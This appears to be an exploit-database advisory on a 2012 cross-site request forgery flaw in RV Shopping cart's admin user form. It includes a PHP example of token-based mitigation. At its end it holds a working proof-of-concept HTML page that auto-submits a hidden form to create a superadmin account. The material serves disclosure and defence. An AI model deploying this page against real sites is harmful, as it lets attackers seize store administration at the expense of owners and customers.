Vendor: RV Shopping cart
Author: DaOne
CVSS: 8.8 (HIGH)
CWE: 352 (Cross-Site Request Forgery (CSRF))
Product Name: RV Shopping cart
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2012

RV Shopping cart CSRF Vulnerability

This exploit allows an attacker to add an admin user to the RV Shopping cart application. The admin form at rvp-admin/user-add.php accepts a POST request without any anti-CSRF token, so an attacker can craft a malicious HTML page containing a hidden form pre-filled with the parameters needed to create an admin user. When a victim who is logged in as an administrator visits that page, the form is submitted automatically by the browser, which attaches the victim's session cookie, and the admin user is added to the application.

Mitigation:

Implementing CSRF protection tokens (a per-session secret embedded in the form and verified on every state-changing POST), validating the HTTP Referer or Origin header, and using a CAPTCHA on sensitive admin actions can help mitigate CSRF attacks.
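The token-based mitigation above, shown as an added example for an admin "add user" form; this is not RV Shopping cart's own code, and the function names `csrf_token` and `require_csrf_token` are assumptions:

```php
<?php
// Added example (not the vendor's code): synchronizer-token CSRF protection
// for a form such as rvp-admin/user-add.php. Helper names are assumptions.
session_start();

// Issue one unpredictable token per session and reuse it until logout.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Reject the request unless it carries the session's token and, when the
// browser sends an Origin/Referer header, that header names this site.
function require_csrf_token(): void {
    $expected = $_SESSION['csrf_token'] ?? '';
    $sent     = $_POST['csrf_token'] ?? '';
    // hash_equals is constant-time; the empty check covers a missing token.
    if ($expected === '' || !hash_equals($expected, $sent)) {
        http_response_code(403);
        exit('CSRF token missing or invalid');
    }
    // Secondary check only: some clients omit these headers, so absence is
    // tolerated, but a present header pointing at a foreign host is rejected.
    $origin = $_SERVER['HTTP_ORIGIN'] ?? ($_SERVER['HTTP_REFERER'] ?? '');
    if ($origin !== '' && parse_url($origin, PHP_URL_HOST) !== $_SERVER['SERVER_NAME']) {
        http_response_code(403);
        exit('Cross-origin request rejected');
    }
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['save_user'])) {
    require_csrf_token();
    // ... user-creation logic runs only after the checks above pass ...
}
?>
<!-- The token is a hidden field; a cross-site page cannot read it. -->
<form method="POST" action="user-add.php">
  <input type="hidden" name="csrf_token"
         value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES) ?>">
  <input type="text" name="username">
  <input type="email" name="email">
  <input type="password" name="password">
  <input type="submit" name="save_user" value="Save">
</form>
```

With this in place the PoC form below still submits, but the POST lacks a valid `csrf_token` and is answered with 403 before any user is created.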

Exploit-DB raw data:

# Exploit Title: RV Shopping cart CSRF Vulnerability
# Date: 26/08/2012
# Author: DaOne (@LibyanCA)
# Vendor: http://www.scripts4webmasters.com
# Greetings to LCA

# CSRF Add Admin

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://[target]/rvp-admin/user-add.php">
<input type="hidden" name="user_id" value=""/>
<input type="hidden" name="username" value="webadmin">
<input type="hidden" name="email" value="admin@email.com">
<input type="hidden" name="password" value="pass123">
<input type="hidden" name="group[]" value="1"/>
<input type="hidden" name="active" value="1"/>
<input type="hidden" name="superadmin" value="1"/>
<input type="hidden" name="postnote" value=""/>
<input type="hidden" name="save_user" value="Save"/>
</form>
</body>
</html>